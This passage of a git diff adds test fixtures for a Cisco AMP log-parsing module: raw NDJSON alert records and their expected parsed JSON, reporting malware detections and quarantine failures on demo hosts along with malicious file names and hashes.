Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":876000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":845000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":798000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":767000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":751000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":735000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json new file mode 100644 index 000000000000..fb066a1b3377 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log-expected.json @@ -0,0 +1,3294 @@ +[ + { + "@timestamp": "2021-01-14T21:17:16.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.6A37D750F0-100.SBX.TG", + "cisco.amp.detection_id": "6508397899087347713", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 295927133, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6508397899087348000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "41476df3138717868118d8542cf3d1d6", + "file.hash.sha1": "5ca4bef8de6def53519d4b22632675bb4c1e470b", + "file.hash.sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "file.name": "resume.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "41476df3138717868118d8542cf3d1d6", + "5ca4bef8de6def53519d4b22632675bb4c1e470b" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:38:26.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.E4FCCBFA69-95.SBX.TG", + "cisco.amp.event_type_id": 1107296272, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 844899579, + "event.action": "Executed malware", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 14930696955218, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-14T20:38:26.000Z", + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 1313, + "process.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412680266518626319", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 587000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 2612, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412680266518626317", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 494000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 3794, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.E4FCCBFA69-95.SBX.TG", + "cisco.amp.detection_id": "6412680266518626318", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 572000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b5ede95ec8bc4ad6984758be42b152bd", + "file.hash.sha1": "f504774b72acfb23a46217aec9c6559fd7e4df64", + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "file.name": "QuotaGroup.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 6511, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "b5ede95ec8bc4ad6984758be42b152bd", + "f504774b72acfb23a46217aec9c6559fd7e4df64" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.E4FCCBFA69-95.SBX.TG", + "cisco.amp.detection_id": "6412680266518626316", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 478000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b5ede95ec8bc4ad6984758be42b152bd", + "file.hash.sha1": "f504774b72acfb23a46217aec9c6559fd7e4df64", + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "file.name": "28242311.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 9339, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "b5ede95ec8bc4ad6984758be42b152bd", + "f504774b72acfb23a46217aec9c6559fd7e4df64" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303574240493599", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 12926, + "related.hash": [ + "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303574240493597", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 14119, + "related.hash": [ + "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526295", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 15312, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526294", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 16498, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526293", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": 